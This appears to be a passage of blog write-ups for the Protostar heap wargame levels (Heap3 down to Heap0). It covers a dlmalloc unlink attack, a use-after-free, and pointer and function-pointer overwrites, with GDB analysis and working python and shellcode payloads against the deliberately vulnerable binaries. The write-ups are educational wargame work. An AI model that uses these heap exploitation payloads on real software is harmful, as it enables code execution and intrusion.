(FAILED ATTEMPT #1) My idea was to overflow the “b” allocated space from Image 2 to overwrite the chunk header metadata (prev_size and size fields) belonging to “c” allocated space and thus, when free gets called at line 24 from our C source, trick the program to think that the previous chunk (the “b” chunk) is free and unlink it, causing the “b” chunk’s first 8 bytes of “User data” field to be interpreted as FD and BK and thus giving us the arbitrary write we need to write the address of winner to redir_loc. Considering the code for backward merging from [2] I designed my exploit:

Screenshot from 2018-01-18 16-16-59.png

Image 5: backward merging code snippet

./heap3 AAAA `python -c ‘print “redir_loc_bytes” + “winner_addr_bytes” + (32 – 4 – 4) + chk_b_size_4B + even_size_val ‘` CCCC

  • AAAA: dummy bytes for “a”, not used.
  • `python -c ‘print “redir_loc_bytes” + “winner_addr_bytes” + (32 – 4 – 4) + chk_b_size_4B + even_size_val ‘`: First print 4 bytes representing the redir_loc, then write 4 bytes representing winner_addr, and then fill the rest of the “b” allocated space. After that write “b” chunk size (which has the value 0x29) and another 4 bytes which will represent size of the “c” allocated space with last bit set to 0 which indicates that the previous chunk is not in use (is freed).
  • CCCC: dummy bytes for “c”, not used

I will encode the memory structure of allocated and free chunks as follows (for easier understanding):

(A, chunk_name(a/b/c) | prev_sizesizeuser_data…)  => Allocated chunk

(F, chunk_name(a/b/c) | prev_sizesizeFD, BK, unused_space…) => Free chunk

After exploit code gets called, the heap would look something like this (before the first call to free):

(A, a | prev_size, size, AAAA“)

(F, b | prev_size, size, redir_loc, winner_addr, padding)

(A, c | 0x00000029, even_size_val, “CCCC”)

After first call to free(c), the program would get tricked that the “b” chunk is free because of the overwritten “c” chunk’s size field which will end with a 0 bit which indicates that previous chunk is not in use. After that, free(c) would call unlink on the “b” chunk and thus causing winner_addr to be written at redir_loc (Image 3, line 4). The value 0x00000029 is used for navigating to the start of the previous chunk by Image 5, line 4.

Reason this approach fails: The value 0x00000029 I needed to input via command line couldn’t be given because bash always strips the null bytes (because they represent string terminator or something like that). Second, even if I did input those bytes, line 4 from Image 3 (FD -> bk = BK) would actually write BK at (FD + 12), that will result in writing winner_addr at redir_loc+12.

(FAILED ATTEMPT #2) We failed miserably when trying the previous exploit, so what are the alternatives? It is shown, with a simple trick, that is possible to use negative numbers to make things work. I said previously that bash wouldn’t accept small numbers because they contain NULL bytes which bash would ignore. But what if we input really really large numbers, so large that they are actually interpreted as negative integers?

If we set the “c” chunk’s prev_size to -8 and its size to -4 (which is still even and indicates that the previous chunk is free), we can get the forwards merging unlink call to actually work. Consider the new heap structure (before free(c)) after the follwing shellcode:

./heap3 AAAA `python -c ‘print “B”*32 + 0xfffffff8 + 0xfffffffc ‘` `python -c ‘print “C”*8 + (redir_loc – 12) + winner_addr’`

(A, a | prev_size, size, AAAA“)

(A, b | prev_size, size, padding)

(A, c | 0xfffffff8, 0xfffffffc, “CCCCCCCC”, (redir_loc – 12), winner_addr)

What will happen here when free(c) gets called is the following: The program will see that the “c” chunk’s size field is set to 0xfffffffc which represents -4 and because it is an even value, it will think the previous chunk is free. Then, by Image 5, line 4, it will navigate to the previous free chunk by subtracting its prev_size field (0xfffffff8 = -8) from the start of “c” chunk pointer and thus actually adding +8 and moving into the “c” chunk by bytes, arriving at the beginning of the memory allocated by malloc(c). We can then forge an “virtual” chunk inside the chunk “c”‘s “User data” field which will be interpreted as a free chunk and unlinked. This looks like this:

Screenshot from 2018-01-18 18-44-28.png

Image 6: heap state after executing user exploit

The “CCCCCCCC” bytes represent fake prev_size and size bytes in the fake chunk made inside the “c” chunk “User data” space after which (redir_addr – 12) and winner_addr are located, which represend FD and BK because the fake chunk is considered free.

Reason this approach failed: This approach will actually overwrite redir_addr with winner_addr, but some code after that will try to write at some address inside .txt section which is write protected. Here is a snippet of that problem:

Screenshot from 2018-01-18 18-55-47.png

Image 7: writing to protected .txt section

Indeed, by executing GDB command “maintenance info sections” we can see that the address 0x08048864 + 0x8 belongs to .txt section.

(SUCCESSFUL ATTEMPT) Ok, now that I knew that the problem is writing to .txt protected section, and because we have plenty of space allocated on the heap, we could write a simple shellcode which will redirect our execution to the winner function. So instead of providing winner_addr, we will provide shellcode_addr which we will put inside the “a” chunk “User data” space.

There is a neat website that can compile shellcode for us: https://defuse.ca/online-x86-assembler.htm#disassembly

If you don’t want to use the site, you can compile it manually:

  1. make a file shellcode.asm containing the following instructions:
    • mov eax, 0x08048864
    • jmp eax
  2. compile the file using the command: nasm -f elf shellcode.asm
  3. link the file using the command: ld -m elf_i386 -o shellcode shellcode.o
  4. using objdump -D shellcode command, extract instruction bytes

Our working payload is now:

./heap3 `python -c ‘print “A”*16 + “\xb8\x64\x88\x04\x08\xff\xe0″‘` `python -c ‘print “A”*32 + “\xf8\xff\xff\xff” + “\xfc\xff\xff\xff”‘` `python -c ‘print “B”*8 + “\x1c\xb1\x04\x08” + “\x18\xc0\x04\x08″‘`

Parameters:

  • “A”*16: shift padding
  • “\xb8\x64\x88\x04\x08\xff\xe0”: shellcode
  • “A”*32: padding for “b” chunk
  • “\xf8\xff\xff\xff”: -8
  • “\xfc\xff\xff\xff”: -4
  • “B”*8: dummy bytes for fake prev_size and size for fake chunk
  • “\x1c\xb1\x04\x08”: fake chunk’s FD (redir_loc – 12)
  • “\x18\xc0\x04\x08”: shellcode address inside “a” chunk

One thing to note here is the first 16 padding “A” bytes which are there because when free(a) gets called, some other data gets written to the memory locations where “a” chunk “User data” begins and that would overwrite our shellcode, so we just need to shift it by a few bytes (in this case 16) for it to not get overwritten.

Proof of work:

Screenshot from 2018-01-18 19-19-02.png

Image 8: proof that exploit code works

That’s it! Thanks for reading!

References

[1] Heap Overflows and Double-Free Attacks, http://homes.soic.indiana.edu/yh33/Teaching/I433-2016/lec13-HeapAttacks.pdf

[2] Heap overflow using unlink, https://sploitfun.wordpress.com/2015/02/26/heap-overflow-using-unlink/

[3] dlmalloc source code, ftp://g.oswego.edu/pub/misc/malloc.c

Protostar Heap2

Level Text

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

struct auth {
  char name[32];
  int auth;
};

struct auth *auth;
char *service;

int main(int argc, char **argv)
{
  char line[128];

  while(1) {
      printf("[ auth = %p, service = %p ]\n", auth, service);

      if(fgets(line, sizeof(line), stdin) == NULL) break;
      
      if(strncmp(line, "auth ", 5) == 0) {
          auth = malloc(sizeof(auth));
          memset(auth, 0, sizeof(auth));
          if(strlen(line + 5) < 31) {
              strcpy(auth->name, line + 5);
          }
      }
      if(strncmp(line, "reset", 5) == 0) {
          free(auth);
      }
      if(strncmp(line, "service", 6) == 0) {
          service = strdup(line + 7);
      }
      if(strncmp(line, "login", 5) == 0) {
          if(auth->auth) {
              printf("you have logged in already!\n");
          } else {
              printf("please enter your password\n");
          }
      }
  }
}

Intro

This level was a bit messy. Messy in a way that it’s poorly written, either on purpose or in a hurry, which resulted in a lot of WTF-s in the process of understanding what was going on. The level itself is not hard at all, it introduces a new type of vulnerability: use-after-free. This vulnerability is created when referencing memory after it has been freed, resulting in a crash or undefined system behavior.

I want to mention a few things about this code that generated some problems along the way: The struct auth declared at line 7 and struct auth * auth at line 12 share the same name, which results in problems when using malloc at line 25, which (in my case at least) allocates 4 bytes of memory instead of 36 bytes because it gets the size of struct auth * auth from line 12 instead of struct auth at line 7. I’ll show this in more detail in the solution section of this post.

This program accepts some commands and acts accordingly. There are 4 commands: “auth”, “reset”, “service” and “login”. “auth” is used for user authentication that is in this case a definition of the struct auth (ideally). “reset is used to free the memory allocated for struct auth (ideally), “service” is used for setting up a fictional service that is in this case only a copy of a given string. “login” is used to perform authentication of the user by checking if the auth member of struct auth structure is set (another bad practice of writing code).

Solution

Solution steps:

  1. Allocate memory for struct auth using “auth” command.
  2. Free memory allocated in step 1 by using “reset” command.
  3. Provide sufficiently large input using “service” command such that it will overflow the auth member of struct auth allocated previously at the same space where service string will now reside.
  4. Perform authentication by issuing the “login” command which will use the pointer that points to memory which was previously unallocated (this is where use-after-free happens).

After loading the program in GDB and disassembling it using Intel syntax, the useful breakpoints we could set are: After “auth” command sets-up the user structure (struct auth ideally) at main + 205, after “reset” deallocates memory at main + 250, after “service” allocates memory for the new string and places it there at main + 297 and after “auth” which will log us in if we did everything right at main + 346.

Step 1: First we issue the command “auth USER” which will allocate memory for struct auth (ideally) and set it’s name to “USER”. Note that the auth integer attribute remains unchanged and it’s set to 0.

1_after_set_user.png

Image 1: Allocated “USER” sting in memory

Image 1 shows how the things look in memory after we issue the mentioned command. But something’s wrong. Allocated memory where we are allowed to write is located at 0x8189818 as saved in EAX register (return value of malloc), but after printing few bytes before that (starting at 0x8189810), the chunk header shows that there are only 16 bytes allocated (this is from 0x00000011 where the LS bit is a flag pointing out that the previous chunk is allocated) instead of required 36 bytes for the struct auth. The reason for this is because at line 25, the malloc call gets the size of the pointer named the same as the structure, and because every pointer is 4 bytes in size, malloc allocates 4 bytes plus the additional 8 bytes for the header and another 4 bytes required for alignment (I guess it’s for the alignment according to some minor research on Stackoverflow and such).

Step 2: In this step we will “reset” (deallocate) the allocated memory in the previous step.

Screenshot from 2018-01-10 16-22-22.png

Image 2: deallocating memory

Image 2 shows that when we deallocate the memory allocated in the previous step, it still contains the contents we had there before it was deallocated, that is the “USER” string. After deallocation, the freed memory is now available for allocating it again, and this is exactly what we will do in step 3.

Step 3: By issuing the “service” command 3 times, giving different arguments each time: “AAAABBBB”, “CCCCDDDD” and “EEEEFFFF” we can see that it got written in the deallocated space from the previous step (0x8189818). By 3 times calling the “service” command, we also get 3 chunk headers because those are 3 separate allocations (one for each “service” command).

Screenshot from 2018-01-10 16-33-19.png

Image 3: successful exploitation of use-after-free vulnerability

Image 3 shows how new strings are written in memory. Another programming error occurred at line 35 where the space character is also taken as the part of the string (that’s the reason why there are 0x20 bytes at the beginning of each word).

Step 4: Referencing to image 3, we can see that the login command was issued. By issuing the “login” command, we can see that the program tries to access address previously stored in struct auth * auth pointer, which still exists in that pointer, but it’s memory got deallocated (and later replaced with the strings we provided by issuing “service” command). The code in “login” command at line 38 tries to access address *(auth + 32) which will result at accessing content at address 0x8189834 and because this is the location of the heap chunk header size of the memory chunk that contains “EEEEFFFF”, it will be populated with some data (the size of allocated memory) and result in a value different than 0 which will result in the program granting us access to the account created earlier.

Thanks for reading!

Protostar Heap1

Level text

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct internet {
  int priority;
  char *name;
};

void winner()
{
  printf("and we have a winner @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  struct internet *i1, *i2, *i3;

  i1 = malloc(sizeof(struct internet));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct internet));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");
}

Intro

This level covers another heap-based vulnerability exploitation and unlike the previous level, which was just an introductory one, this level requires us to exploit a vulnerability using a technique similar to stack-based buffer overflows used in the previous levels to redirect execution of the program to our desired location, function winner.

First time I encountered malloc was in an introductory C programming class and used it rarely ever again. I just knew that it allocated memory and returned an address to that allocated space. Although not necessary for solving it, this level made me explore the inner workings and some implementation details of this important function.

malloc and free are two functions used in dynamic memory allocation. malloc is used for allocating memory space and free for deallocating it. It is necessary to say that those two functions are not system calls but convenient wrappers around system calls. For example, malloc will call system calls brk or mmap, depending on the situation, to request more free space from the kernel. Imagine them as wrappers which could (and usually are) implemented differently across different systems, but the general functionality remains the same. You can read more about the inner workings of malloc and heaps in general at [1] which describes the glibc implementation of malloc.

Ok, this level focuses on the heap and not the stack, but what are the differences between the two and what are the implications for our approach to the solution?

Stack is used for static memory allocation and heap for dynamic. The stack is a LIFO (last in first out) structure used for storing local variables, tracking and calling function calls with the most recently reserved block always freed first. Managing the stack is trivial by incrementing or decrementing a pointer while the heap management is more complex. The complexity of heap management follows from its structure because unlike the stack, the heap is not well structured (adjacency of reserved memory is not guaranteed). Heap is a memory space which can be arbitrarily populated via allocations of different sizes and subsequent allocations may not be trivial if (for example) there is not enough space for reserving desired amount of memory on the heap, in which cases additional interactions with the kernel are required. There is one stack for each existing thread, while the number of heaps can vary from one to many, but unlike the stack, maximum number of threads can be much greater than the number of heaps, meaning some threads will share heaps. From the malloc glibc implementation, the number of so called “arenas” (I imagine the arenas as a heap container which can store multiple heaps, read more at [1]) is determined by the number of processor cores and architecture (32 bit vs. 64 bit). This means that there is a need for synchronization because of contemporary thread allocations on the same heap(s), which will slow things up. In contrast, the same stack addresses are usually accessed much more often so they can be mapped (because we work in the virtual address space) to the processor’s cache and their access can be sped up significantly. Unlike the stack which has a fixed size determined when the thread is created, the heap size is set on application startup and can grow as it is needed by the application (by asking the kernel for more memory using aforementioned system calls).

The things we know for now is that we need to somehow redirect program execution. Ok, great, the first thing that comes to mind is overwriting the return address of main, but how? We can see from lines 31 and 32 from the code above that the first argument is copied to the first structure’s name attribute (it’s allocated space on the heap) which size is 8 bytes and then the next argument is copied to the second structure’s name allocated space. If we recall how strcpy works, we know that it copies byte array given as the second argument to the address given by the first argument, without making security checks if there is enough allocated space to accommodate the whole byte array given (in this case, by the user). This is our attack vector.

If we give a sufficiently large input (in this case, larger that 8 bytes) as the first argument, it will cause an overflow on the heap. Now, let’s recall what that means: We had a bunch of calls to malloc which allocates some space on the heap and then we copy user input to that space. Note that the memory allocated spaces don’t have to be adjacent, because malloc tries to find a sufficiently large space to accommodate the desired amount of bytes and nothing ensures that the space between two subsequent allocations is not occupied by some other allocation that happened before that. I will go more into detail in the “solution” section of this post.

The main idea behind this attack is to overflow allocated memory given by one call of malloc and for that overflowed data to overwrite some specific address at some location in an another heap allocated space given by another malloc call. The idea is the same as the one we did before on the stack based overflow levels, the only difference is that nothing ensures adjacency of interesting memory addresses (because we work on the heap and not the stack).

Exploit consists of overflowing the second allocated memory space (specifically the space pointed to by i1->name) into the memory space pointed to by i2, overwriting the memory address of i2->name pointer so that it points to some desired address that we want. That gives us the ability to redirect program flow to address given by the second user given argument, which will be written to the overwritten address of i2->name pointer. Details of this exploitation will be covered in the next part of this post.

Solution

Steps for exploitation:

  1. Find where i1->name is pointed at after memory allocation (where data will be stored).
  2. Find address of i2->name character pointer (which we need to overwrite).
  3. Find the offset from *(i1->name) to i2->name so we can tailor out input.
  4. Find address of winner (which we need to call).
  5. Find address of location from where the execution will be redirected from (location from which we will bounce our execution to winner).
  6. Execute exploit.

Step 1: using GDB, we first disassemble the binary using disassemble main, note that the standard disassembly syntax is set to AT&T, to set it to Intel which is in my opinion more readable, enter GDB command set disassembly-flavor intel. Find the malloc call which corresponds to the one at the 25th line in the given code (located at (main + 46)) and set a breakpoint line after that using command break *(main + 47). The result of malloc function call, which is the address of allocated space, will be stored in EAX register, which we can (after hitting our breakpoint) see with the command info registers eax or i r eax for short. After running the program with run command, we find that the address of memory allocated to i1->name is:  *(i1->name)@0x095BA018 (address may vary).

Screenshot from 2018-01-04 18-03-28.png

Step1: Finding address of *(i1->name)

Step 2: almost the same as in previous step, except now we need the actual address of i2->name struct member and not the memory allocated to it. This can be achieved by setting a breakpoint immediately after memory allocation for i2 is done by the malloc call at line 27 in given C code. After finding that call in disassembly, the breakpoint is set at *(main + 68), this gives us the address of memory allocated for accommodating the internet structure and pointed to by i2 which is: i2@0x095ba028. If we look at the internet structure, we can conclude that the address of name structure member (which is of type character pointer) will reside 4 bytes after the beginning of the memory allocated for the structure itself (after i2@0x095ba028), so the address of name member is: i2->name@0x095ba02c.

Step 3: we need to find out the offset from the address found at step 1 to the address found at step 2 so we know how many bytes we need to supply via user input. This is done simply by subtracting: 0x095ba02c – 0x095ba018 = 0x14 = 20 bytes. This means we need to write in 20 bytes as the first argument to overflow to the i2->name structure member and the bytes we write next will overwrite it. Note that this program is not big and that there is plenty of space on the heap. Although nothing guarantees that subsequent calls to malloc will result in adjacent memory allocations, by the described way the heap works (as a doubly linked list of free memory chunks) I can assume that at least first few allocations could result in adjacent memory spaces. Let’s see with GDB. Setting breakpoint after user input is written to allocated memory addresses, we examine the memory:

Let’s analyze the i1 structure. When structure corresponding to i1 was allocated, malloc returned address 0x800Screenshot from 2018-01-04 23-33-35.png4a008, at which is the content of the priority field (set to 1). Little before that is a field with 0x00000011. This field represents how many bytes does the allocation take and the last bit (PREV_INUSE flag bit is set, look at [1]) means that the previous chunk is allocated and because of that, the 0x00000000 bytes starting at address 0x804a000 represent user data (the same goes with the other chunks). We can also see that consecutive malloc calls gave consecutive accessible memory regions starting at: 0x804a008, 0x804a018, 0x804a028, 0x804a038.

View of an allocated chunk (from [1])

Step 4to get the address of winner we can enter in GDB the command print winner and get the address: winner@0x08048494.

Step 5: this is the address from which the program flow could be redirected. For example, this can be the location of the saved return address (also called saved eip), which, when overwritten to the address of winner function, will redirect our program flow to the winner function when the program attempts to return from main program function. We did this a lot in the stack-based buffer overflow levels. The more reliable way (which I recall I did only a few times before) is to overwrite the PLT (procedure linkage table) entry for some dynamically linked function from our program (such as printf function).

Image result for plt and got

Role of PLT in dynamically linked function calls (from Eli Bendersky’s article on PIC)

A short reminder on how PLT and GOT work (the details can be found at [2]): When you compile a program that uses some dynamically linked library (for example you have a printf call), you don’t write that function’s code yourself because it already exists somewhere on the system in some library. Because the compiler doesn’t know the exact address of that function (because it doesn’t know where exactly the library will be loaded during execution) it leaves a “blank” space reserved for the address of that function in the Global Offset Table (GOT). If we say GOT is all we need, we might get into trouble, because that means we need to resolve (find) all the addresses of all the functions provided by that dynamically linked library and put them into GOT because we don’t know which functions will get called and which wont, this means that if we have a small program with only one call to printf, we would still need to find all the addresses to all the other functions provided by C standard library (where printf is defined) and that takes time. To aid this problem another level of indirection is implemented in the form of a Procedure Linkage Table (PLT) which is basically just a “trampoline” that instructs the resolution only of those functions we need to call in our program. So when we call printf we won’t actually call printf directly, but corresponding PLT entry will be called instead , which is just a piece of code instructing the resolution of the function’s address which will be added to GOT. This is called “lazy” approach.

So we are left with two options (two that I know about at least): The address of the saved instruction pointer register (saved RETURN address) which we can get with the GDB command info framesaved_EIP@0xfff9767c. Another option is to find the address of the PLT entry from a known function call, for example printf. In disassembly we can see that there is no printf call, only a call to puts. This is just an optimization which will still work fine.

Screenshot from 2018-01-04 19-13-29.png

puts is called instead of printf

As I said before, PTL entries are just a bunch of code, which means we could disassemble it:

Screenshot from 2018-01-04 19-16-59.png

Disassembly of puts PLT entry

So the address we could overwrite is the address the PLT entry for puts will jump to when trying to resolve its address in GOT: puts_GOT@0x08049774.

Step 6: the exploit is executed by providing tailored input as the two command line arguments the program expects. The goal of the first argument is to overflow i1->name heap buffer into the i2 structure and overwrite the address of i2->name with the address of either the saved_EIP or puts_GOT address. The goal of the second argument is to simply provide the address to which the execution will be redirected.

Generally, exploit could look like this:

./heap1 `python -c ‘print “A” * struct_offset + exec_redir_addr + ” ” + winner_addr‘`

Where:

  • struct_offset = 0x14 = 20 bytes
  • exec_redir_addr = puts_GOT or saved_EIP
  • winner_addr = 0x08048494

Here is proof of work:

Screenshot from 2018-01-04 19-51-48.png

Exploited by overwriting saved_eip (return) address on Protostar VM

Screenshot from 2018-01-04 20-05-34.png

Exploited by overwriting puts_GOT address on Protostar VM

NOTE #1: Addresses may vary.

NOTE #2: Although the level can be exploited on the given virtual machine, I wanted to copy the heap1 level to my local Kali machine because I’m more used to it and wanted to exploit it there. From here I stumbled upon some problems. I tried with the saved_EIP exploit method and noticed that each time I tried to start the program using the same exploit from the same directory (so the environment variables would not change) the address of saved_EIP would change. This is because ASLR is enabled by default. To prove this, I temporarily disabled ASLR by editing /proc/sys/kernel/randoimze_va_space and changing its value from to 0 (which disables it). Next time I ran the program the address of saved_EIP didn’t change through consecutive program execution and the exploit was possible. Exploitation by overwriting puts_GOT didn’t result in GOT jump address (first instruction inside PLT) being randomized, even if ASLR is used and the GOT is inside the data segment which should be randomized by ASLR. I did a minor research and found that if the executable is not compiled as PIE (that is position independent executable) you don’t get much benefit from ASLR because not every memory region gets randomized, and I can’t find out why exactly. My guess is because maybe PLT couldn’t work with everything randomized as it needs to know the position of GOT . [3] states that if executable isn’t PIE, it surely hasn’t it’s text segment randomized, also this post  states that any reference from a non-PIC/PIE code to a function from a dynamically linked library needs PLT for address resolution because the non-PIC/PIE executable expects function addresses to be static/known (which they are, because the real function call is replaced with PLT entry address which is known prior to execution).

References

[1] https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/
[2] https://eli.thegreenplace.net/2011/11/03/position-independent-code-pic-in-shared-libraries/
[3] https://securityetalii.es/2013/02/03/how-effective-is-aslr-on-linux-systems/

Thank you for reading!

Protostar Heap0

Level description

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct data {
  char name[64];
};

struct fp {
  int (*fp)();
};

void winner()
{
  printf("level passed\n");
}

void nowinner()
{
  printf("level has not been passed\n");
}

int main(int argc, char **argv)
{
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);
  
  f->fp();

}

Intro

This is an introductory level to heap overflows. As can be seen from the code above, this is almost exactly the same case as the simple buffer-overflow ones from some of the first blog posts in Protostar series. It’s not hard to see that we have a strcpy call with user supplied argument at line 36. After a short inspection of declared structures, we can conclude that, given a sufficiently large user input, the data structure member name will overflow into the function pointer structure fp and thus overwrite it’s member (which is a function pointer). To make things easier, we are even given the addresses of data and fp which we will need to calculate the address offset. The main difference between this type of overflow and the basic buffer-overflow we had in earlier levels is that now we are exploiting stuff on the heap (lower memory addresses) instead of the stack (higher memory addresses).

Solution

I’ll keep it short because it’s an introductory and easy level. The steps for exploitation are:

  1. Find addresses of data and fp structures.
  2. Calculate offset between data and fp.
  3. Find address of winner function.
  4. Tailor user input to overflow data struct and overwrite the function pointer in fp with the winnner function’s address.

We are given the addresses of data and fpdata@0x87db008 and fp@0x87db050. Offset between the two is 72 bytes. We can get the address of winner function by calling: “print winner” from GDB, the address is: winner@0x08048464. Now that we have everything, we can write the exploit:

./heap0 `python -c “print ‘a’ * 72 + ‘\x64\x84\x04\x08′”`

This should give us a message: “level passed”.

On to the more complex ones!